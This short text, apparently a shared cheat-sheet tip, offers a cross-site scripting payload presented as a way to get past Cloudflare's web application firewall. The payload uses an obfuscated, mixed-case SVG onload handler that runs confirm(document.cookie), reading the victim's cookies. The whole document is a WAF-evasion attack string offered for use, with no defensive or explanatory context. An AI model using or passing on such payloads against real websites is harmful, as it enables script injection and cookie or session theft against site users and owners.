XSS payload to bypass cloudfare WAF :
“><svg/svg/svg/On/OnLoAd=confirm(document.cookie)><! —